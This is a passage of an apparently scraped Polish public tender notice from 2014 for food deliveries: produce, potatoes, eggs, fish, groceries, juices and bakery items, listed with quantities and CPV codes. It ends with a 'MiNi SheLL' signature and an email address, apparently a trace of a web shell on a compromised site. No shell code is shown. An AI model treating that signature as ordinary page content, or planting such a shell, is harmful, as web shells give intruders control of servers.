PIETRUSZKA świeża, sucha, bez śladów uszkodzeń mechanicznych	110 kg
PIETRUSZKA ZIELONA czysta, świeża, nie zgniła, nie zwiędnięta	360 szt/pęczki
PIETRUSZKA SUSZONA  25g, bez śladów uszkodzeń mechanicznych	      20 szt
SAŁATA ZIELONA, świeża, czysta, nie zgniła I gatunek	310 szt
SELER świeży, suchy, bez śladów uszkodzeń mechanicznych	200 kg
PIECZARKI, I gatunek, nie zwiędnięte	250 kg
PAPRYKA CZERWONA, świeża, czysta, bez śladów uszkodzeń mechanicznych	30 kg
POMIDORY, dojrzałe, bez śladów uszkodzeń mechanicznych 	30 kg
POMARAŃCZE, słodkie, bez śladów uszkodzeń mechanicznych	600 kg
GRUSZKI, średnio miękkie, słodkie, bez śladów uszkodzeń mechanicznych	400 kg
NEKTARYNKI średnio dojrzałe, bez śladów uszkodzeń mechanicznych	150 kg
BRZOSKWINIE
średnio dojrzałe, bez śladów uszkodzeń mechanicznych	150 kg
BANANY średnio dojrzałe, bez śladów uszkodzeń mechanicznych	600 kg
MANDARYNKI bez pestkowe, średnio dojrzałe, bez śladów uszkodzeń mechanicznych	400 kg
KAPUSTA BIAŁA - młoda bez śladów uszkodzeń mechanicznych	220 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zamówienia - dostawa ziemniaków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ziemniaki jadalne, nie zzieleniałe, czyste, suche, nie nadmarznięte, bez śladów uszkodzeń mechanicznych, dane identyfikacyjne (producent, kraj)	9200kg
Ziemniaki młode,
nie zzieleniałe, czyste, suche, nie nadmarznięte, bez śladów uszkodzeń mechanicznych, dane identyfikacyjne (producent, kraj)	1000kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zamówienia  - dostawa jaj.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> JAJA- kurze klasy A, konsumpcyjne, masa L, jaja duże o wadze jednostkowej od 63g - 73g	11900 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zamówienia - dostawa ryb.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> FILET Z dorsza b/s mrożony, najwyższej jakości - I gat., świeży, czysty, właściwie wyporcjowany i opakowany, świeżo mrożony, bez lodu
	40 kg
FILET Z MIRUNY b/s
 mrożony, najwyższej jakości - I gat., świeży, czysty, właściwie wyporcjowany i opakowany, świeżo mrożony, bez lodu
	200 kg
FILET Z MIRUNY ze skórą mrożony, najwyższej jakości - I gat., świeży, czysty, właściwie wyporcjowany i opakowany, świeżo mrożony, bez lodu
	200 kg
PALUSZKI RYBNE z fileta panierowane, z ryb białych o właściwych cechach organoleptycznych, świeżo mrożone I gat	310 kg
Panierowany filet rybny z mintaja (kostka), z ryb białych, głęboko mrożony o wadze 75 g I gat	90 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zamówienia - dostawa pozostałych artykułów spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> BUŁKA TARTA
	180 kg
KONCENTRAT BURACZANY 300 ml   krakus	40 szt
CUKIER BIAŁY
	550 kg
CUKIER PUDER
	10 kg
DŻEM TRUSKAWKOWY wysokosłodzony- 1 kg (słój)	12 kg
DŻEM TRUSKAWKOWY wysokosłodzony- (wiaderko 6,50 kg)	13 kg
FASOLA JAŚop  5kg
	120 kg
FASOLA JAŚ op 0,50 kg
	15 kg
FASOLA KOLOROWA op 5kg	35 kg
FASOLA KOLOROWA op 0,50 kg	10kg
GROCH ŁUSKANY op
5 kg	65 kg
GROCH ŁUSKANY op 0,50 kg	20 kg
GROSZEK KONSERWOWY 400g	12 szt
KAPUSTA KISZONA 0,9 kg (słój)	200 szt
KASZA JĘCZMIENNA perłowa	150 kg
KASZA MANNA	32 kg

KONCENTRAT POMIDOROWY 0,9 kg, 30% - Pudliszki	150 szt
MĄKA TORTOWA typ 450	650 kg
MAKARON ŚWIDERKI lubella 500g

MAKARON ŚWIDERKI -PEŁNE ZIARNO - lubella 400 g 
	600 szt


160 szt
MAKARON SPAGHETTI  lubella 500g
	500 szt
MAKARON NITKI 
5 jajeczny 250 g-międzybrodzki	240 szt
MĄKA ZIEMNIACZANA
	10 kg
OGÓRKI KONSERWOWE 0,9l (słój)	15 szt
MAGA - Winiary 1000g
	105 szt
MAJONEZ-kielecki 700 g  
	110 szt
KOMPOT ARONIA słój 0,9 l
	235 szt
KOMPOT WIŚNIA słój 0,9l
	235 szt
RYŻ  BIAŁY
	300 kg
RYŻ  BRĄZOWY
	40 kg
OLEJ SŁONECZNIKOWY 1l	50 szt
OLEJ RZEPAKOWY do smażenia 3l	150 szt
NAPÓJ ICE TEA - różne smaki -500 ml	800 szt
CIASTECZKA - belVita różne smaki 50 g	1800 szt
CYNAMON 20 g
	30 szt
MUSZTARDA -stołowa 0,9l
	4 szt
MUSZTARDA - stołowa 200g
	6 szt
SYROP OWOCOWY 5l   -Herbapol
	80 szt
PAPRYKA SŁODKA 0,50 kg (luzem)	2,50 kg
PAPRYKA SŁODKA 0,20g	10 szt
CUKIER WANILINOWY
32g	12 szt
PIEPRZ 0,50kg (luzem)
	8 kg
Pieprz 20g

	10 szt
LIŚĆ LAUROWY 20G
	8 szt
ZUPA BOROWIKOWA - torebka 45g - Winiary	250 szt


ZUPA ZUREK - torebka 45g - Winiary
	160 szt
WEGETA 1KG

	38 kg
OCET JABŁKOWY 6%
255 ml
	20 szt
SÓL
	260 kg
MAJERANEK 15G

	33 szt
OCET 0,5l
	35 szt
PAPRYKA KONSERWOWA 0,9l	10 szt
ZIELE ANGIELSKIE
15 g
	6 szt
SOS DO SPAGHETTI słodko - kwaśny 520g -  Łowicz	450 szt
KASZA GRYCZANA
	20 kg
RODZYNKI 100g
	4 szt
CZEKOLADA różne smaki 100G - Milka	415 szt
WAFLE  PRINCE POLO XXL	415 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zamówienia - dostawa soków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> SOK WITAMINKA butelka 250 ml - bez cukru	1200 szt
SOK KUBUŚ butelka 
300 ml -bez cukru
	1200 szt
SOKI W KARTONACH - MULTIWITAMINA 100% 200ml (ze słomką bez cukru)	1100 szt
SOKI W KARTONACH WIELOOWOCOWE 100% 200ml (ze słomką bez cukru)	1100 szt
SOKI W KARTONACH - POMARAŃCZA 100% 200ml(ze słomką bez cukru)	1100 szt
SOKI W KARTONACH - JABŁKO 100% 200ml(ze słomką bez cukru)	1100 szt
SOKI W KARTONACH - MULTIWITAMINA 100%1L
(bez cukru)	200 szt
SOKI W KARTONACH - JABŁKO 100% 1L
(bez cukru)	200 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zamówienia - dostawa pieczywa i wyrobów cukierniczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> BUŁKI KANAPKOWE- 300g	120szt
BUŁKI KANAPKOWE-
krojone 300g	100szt
CHLEB ZWYKŁY - krojony 1000g	330szt
BUŁKI ZWYKŁE 40g
	1000szt
DROŻDŻE
	3,50kg
GROSZEK PTYSIOWY
	6kg
PĄCZKI 80g
	450szt
RURKI FRANCUSKIE Z BUDYNIEM 70g	450szt
KOPERTY FRANCUSKIE 80g	900szt
MUFINKI 60g	900szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com